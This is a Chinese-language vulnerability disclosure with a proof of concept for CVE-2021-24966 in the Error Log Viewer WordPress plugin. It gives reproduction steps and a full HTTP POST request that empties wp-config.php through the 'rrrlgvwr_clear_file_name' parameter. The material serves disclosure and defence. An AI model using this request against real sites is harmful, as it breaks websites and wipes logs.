# 软件链接:https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# 版本:1.1.1
# 测试环境:Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# 描述:
错误日志查看器是一个简单的实用程序插件,可帮助直接从 WordPress 管理仪表板查找和查看带有错误的日志文件。从一处访问所有日志文件。查看最新活动、按日期选择日志、查看完整日志文件或清除日志文件!
我特别强调了“清除日志文件”语句,因为“清除日志文件”功能可用于删除 Wordpress 网站中的任意文件。该漏洞的原因在于,将要删除的文件路径的值没有得到适当和充分的控制。导致漏洞的参数名称是“rrrlgvwr_clear_file_name”。只有经过身份验证的用户才能对其进行操作。
攻击者可以利用这个漏洞;通过删除 wp-config.php 文件来破坏网站,或者通过清除相关日志文件来覆盖指纹。
# 重现步骤
1.安装并激活插件。
2. 单击错误日志查看器菜单项下的“日志监视器”。
3. 选择要清除的日志文件。
4. 通过 Burp 或任何其他本地代理工具拦截请求。
5. 将参数“rrrlgvwr_clear_file_name”的值替换为要清除的文件路径,如/var/www/html/wp-config.php。
6. 检查清除文件的内容。你会看到文件是空的。
代码语言:javascript复制POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin ]
rrrlgvwr_select_log=/var/www/html/wp-content/plugins/learnpress/inc/gateways/paypal/paypal-ipn/ipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=[05-Feb-2015 07:28:49 UTC] Invalid HTTP request method.
&rrrlgvwr_clear_file=Clear log file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=/wp-admin/admin.php?page=rrrlgvwr-monitor.php
